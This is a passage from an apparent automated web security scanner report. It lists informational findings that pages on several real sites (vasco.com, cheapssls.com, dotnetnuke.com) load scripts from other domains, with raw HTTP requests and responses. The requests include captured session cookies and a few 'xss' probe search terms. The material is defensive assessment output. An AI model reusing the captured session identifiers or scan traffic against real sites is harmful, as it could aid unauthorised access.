<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.243. http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.1.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:32:18 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 23672

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.244. http://vasco.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: vasco.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:32:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 18862

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.245. http://vasco.com/images/css/readmore_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/images/css/readmore_bg.gif

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /images/css/readmore_bg.gif HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:32:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 19495

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.246. http://vasco.com/investor_relations/investor_press/investors_press.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/investor_relations/investor_press/investors_press.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /investor_relations/investor_press/investors_press.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.4.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:34:08 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 46287

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.247. http://vasco.com/services/services.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/services/services.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /services/services.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.5.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:34:11 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 20647

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.248. http://vasco.com/support/support_and_downloads.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/support/support_and_downloads.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /support/support_and_downloads.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/verticals/netsecurity/network_access_security.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.12.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:36:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 23830

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.249. http://vasco.com/training/our_offering/elearning/certified_ethical_hacking.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/training/our_offering/elearning/certified_ethical_hacking.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /training/our_offering/elearning/certified_ethical_hacking.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx?query=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.7.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:35:23 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 30131

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.250. http://vasco.com/user_registration.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/user_registration.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

18.251. http://vasco.com/verticals/appsecurity/online_application_security_overview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/verticals/appsecurity/online_application_security_overview.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /verticals/appsecurity/online_application_security_overview.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.2.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:33:32 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 24159

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.252. http://vasco.com/verticals/banking/onlinebanking.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/verticals/banking/onlinebanking.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /verticals/banking/onlinebanking.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.2.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=scg42x55p3xbinitbik3gp45

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:33:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 23853

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.253. http://vasco.com/verticals/netsecurity/network_access_security.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/verticals/netsecurity/network_access_security.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /verticals/netsecurity/network_access_security.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/user_registration.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.11.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:35:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 24499

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.254. http://www.cheapssls.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png

Request

Response

18.255. http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/comodo-ssl-certificates/positivessl.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://www.googleadservices.com/pagead/conversion.js

Request

GET /comodo-ssl-certificates/positivessl.html HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3

Response

18.256. http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/comodo-ssl-certificates/premiumssl.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://www.googleadservices.com/pagead/conversion.js

Request

Response

18.257. http://www.cheapssls.com/geotrust-ssl-certificates/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/geotrust-ssl-certificates/

Issue detail

The response dynamically includes the following scripts from other domains:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://www.googleadservices.com/pagead/conversion.js

Request

GET /geotrust-ssl-certificates/ HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response

18.258. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/geotrust-ssl-certificates/quickssl-premium.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://www.googleadservices.com/pagead/conversion.js

Request

GET /geotrust-ssl-certificates/quickssl-premium.html HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

18.259. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/geotrust-ssl-certificates/quickssl.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://www.googleadservices.com/pagead/conversion.js

Request

Response

18.260. http://www.cheapssls.com/geotrust-ssl-certificates/rapidssl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/geotrust-ssl-certificates/rapidssl.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://www.googleadservices.com/pagead/conversion.js

Request

GET /geotrust-ssl-certificates/rapidssl.html HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A7%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A7%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A7; stat_uniq_code=134386; __utma=207162305.1887707563.1315085424.1315085424.1315085500.2; __utmb=207162305.6.9.1315095982450; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response

18.261. http://www.cheapssls.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png

Request

Response

18.262. https://www.cheapssls.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cheapssls.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png

Request

GET /?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085500.2; __utmb=207162305.4.9.1315095868404; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A7%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A7%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A7; stat_uniq_code=134386

Response

18.263. https://www.cheapssls.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cheapssls.com
Path:	/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

https://checkout.google.com/buttons/logos?merchant_id=105812893426022&loc=en_US&f=png
https://www.googleadservices.com/pagead/conversion.js

Request

Response

18.264. http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dotnetnuke.com
Path:	/News/Press-Releases/HTTP-Compression-Module.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://munchkin.marketo.net/munchkin.js
https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js

Request

GET /News/Press-Releases/HTTP-Compression-Module.aspx HTTP/1.1
Host: www.dotnetnuke.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=compression+dotnetnuke
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: DotNetNukeAnonymous=f883d1f7-81b9-4b4d-ae65-fb5226b390bd; expires=Sat, 03-Sep-2011 15:25:16 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=f883d1f7-81b9-4b4d-ae65-fb5226b390bd; expires=Sat, 03-Sep-2011 15:25:16 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 15:05:15 GMT
Content-Length: 134254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...
<link id="APortals_25_portal_css" rel="stylesheet" type="text/css" href="/Portals/25/portal.css?3653717" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" ></script>
...[SNIP]...
<body id="Body">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js" ></script>
...[SNIP]...
</div>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript" ></script>
...[SNIP]...

18.265. http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dotnetnuke.com
Path:	/Resources/Wiki/page/Compression.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

